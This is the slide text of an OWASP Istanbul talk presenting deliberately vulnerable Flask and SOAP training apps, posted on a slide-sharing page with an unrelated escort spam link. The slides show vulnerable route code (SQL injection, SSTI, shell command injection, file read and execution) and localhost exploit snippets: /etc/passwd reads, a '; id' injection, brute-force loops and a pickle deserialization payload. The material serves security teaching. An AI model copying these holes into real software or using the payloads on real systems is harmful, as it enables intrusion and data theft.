 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 

OWASP-VulnerableFlaskApp

  • 1. OWASP – Vulnerable Flask App https://owasp.org/www-project-vulnerable-flask-app/ https://github.com/anil-yelken/Vulnerable-Flask-App Anıl Yelken 19.11.2022 OWASP İstanbul
  • 2. OWASP – VULNERABLE FLASK APP -HTML Injection -SSTI -SQL Injection -Information Disclosure -Command Injection -Brute Force -Deserialization -Broken Authentication -DOS -File Upload
  • 3. OWASP – VULNERABLE FLASK APP SQL INJECTION @app.route("/user/<string:name>") def search_user(name): con = sqlite3.connect("test.db") cur = con.cursor() cur.execute("select * from test where username = '%s'" % name) data = str(cur.fetchall()) con.close() import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(data) return jsonify(data=data),200
  • 4. OWASP – VULNERABLE FLASK APP SQL INJECTION
  • 5. OWASP – VULNERABLE FLASK APP HTML INJECTION @app.route("/welcome2/<string:name>") def welcome2(name): data="Welcome "+name return data
  • 6. OWASP – VULNERABLE FLASK APP HTML INJECTION
  • 7. OWASP – VULNERABLE FLASK APP SSTI @app.route("/hello") def hello_ssti(): if request.args.get('name'): name = request.args.get('name') template = f'''<div> <h1>Hello</h1> {name} </div> ''' import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(str(template)) return render_template_string(template)
  • 8. OWASP – VULNERABLE FLASK APP SSTI
  • 9. OWASP – VULNERABLE FLASK APP COMMAND INJECTION @app.route("/get_users") def get_users(): try: hostname = request.args.get('hostname') command = "dig " + hostname data = subprocess.check_output(command, shell=True) return data except: data = str(hostname) + " username didn't found" return data
  • 10. OWASP – VULNERABLE FLASK APP COMMAND INJECTION
  • 11. OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE @app.route("/get_log/") def get_log(): try: command="cat restapi.log" data=subprocess.check_output(command,shell=True) return data except: return jsonify(data="Command didn't run"), 200
  • 12. OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE
  • 13. OWASP – VULNERABLE FLASK APP LFI @app.route("/read_file") def read_file(): filename = request.args.get('filename') file = open(filename, "r") data = file.read() file.close() import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(str(data)) return jsonify(data=data),200
  • 14. OWASP – VULNERABLE FLASK APP LFI
  • 15. OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE @app.route("/get_admin_mail/<string:control>") def get_admin_mail(control): if control=="admin": data="admin@cybersecurity.intra" import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(data) return jsonify(data=data),200 else: return jsonify(data="Control didn't set admin"), 200
  • 16. OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE
  • 17. OWASP – VULNERABLE FLASK APP BRUTE FORCE @app.route('/login',methods=["GET"]) def login(): username=request.args.get("username") passwd=request.args.get("password") if "anil" in username and "cyber" in passwd: return jsonify(data="Login successful"), 200 else: return jsonify(data="Login unsuccessful"), 403
  • 18. OWASP – VULNERABLE FLASK APP BRUTE FORCE
  • 19. OWASP – VULNERABLE FLASK APP FILE UPLOAD @app.route('/upload', methods = ['GET','POST']) def uploadfile(): import os if request.method == 'POST': f = request.files['file'] filename=secure_filename(f.filename) f.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) return 'File uploaded successfully' else: return ''' <html> <body> <form method = "POST" enctype = "multipart/form-data"> <input type = "file" name = "file" /> <input type = "submit"/> </form> </body> </html> '''
  • 20. OWASP – VULNERABLE FLASK APP FILE UPLOAD
  • 21. OWASP – VULNERABLE FLASK APP DOS @app.route("/user_pass_control") def user_pass_control(): import re username=request.form.get("username") password=request.form.get("password") if re.search(username,password): return jsonify(data="Password include username"), 200 else: return jsonify(data="Password doesn't include username"), 200
  • 22. OWASP – VULNERABLE FLASK APP DOS
  • 23. OWASP – VULNERABLE FLASK APP @app.route("/run_file") def run_file(): try: filename=request.args.get("filename") command="/bin/bash "+filename data=subprocess.check_output(command,shell=True) return data except: return jsonify(data="File failed to run"), 200
  • 24. OWASP – VULNERABLE FLASK APP @app.route("/create_file") def create_file(): try: filename=request.args.get("filename") text=request.args.get("text") file=open(filename,"w") file.write(text) file.close() return jsonify(data="File created"), 200 except: return jsonify(data="File didn't create"), 200
  • 25. OWASP – VULNERABLE FLASK APP
  • 26. VULNERABLE SOAP SERVICE https://github.com/anil-yelken/Vulnerable-Soap-Service -LFI -SQL Injection -Information Disclosure -Command Injection -Brute Force -Deserialization
  • 27. VULNERABLE SOAP SERVICE LFI from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.read_file("/etc/passwd"))
  • 28. VULNERABLE SOAP SERVICE SQL INJECTION from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.query("' or '1=1"))
  • 29. VULNERABLE SOAP SERVICE INFORMATION DISCLOSURE from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.get_log())
  • 30. VULNERABLE SOAP SERVICE COMMAND INJECTION from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.get_users("kali /etc/passwd ; id
  • 31. VULNERABLE SOAP SERVICE BRUTE FORCE from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) username_list=["admin","test","siber","siber1"] for username in username_list: print(client.service.query(username))
  • 32. VULNERABLE SOAP SERVICE DESERIALIZATION import socket,pickle,builtins HOST = "127.0.0.1" PORT = 8001 class Pickle(object): def __reduce__(self): return (builtins.exec, ("with open('/etc/passwd','r') as files: print(files.readlines())",)) with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: sock.connect((HOST,PORT)) sock.sendall(pickle.dumps(Pickle())) from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.deserialization())
  • 33. ŞIRKET SOSYAL MEDYA HESAPLARI • https://kaleileriteknoloji.medium.com/ https://www.linkedin.com/company/54162391 https://twitter.com/kaleileri https://twitter.com/kaleakademi https://www.instagram.com/kaleileri/ https://www.instagram.com/kalesiberakademi https://github.com/kaleakademi https://www.youtube.com/results?search_query=kale+ileri+teknoloji+
  • 34. KIŞISEL SOSYAL MEDYA HESAPLARIM • https://www.linkedin.com/in/ayelk/ • https://twitter.com/anilyelken06 • https://medium.com/@anilyelken • https://github.com/anil-yelken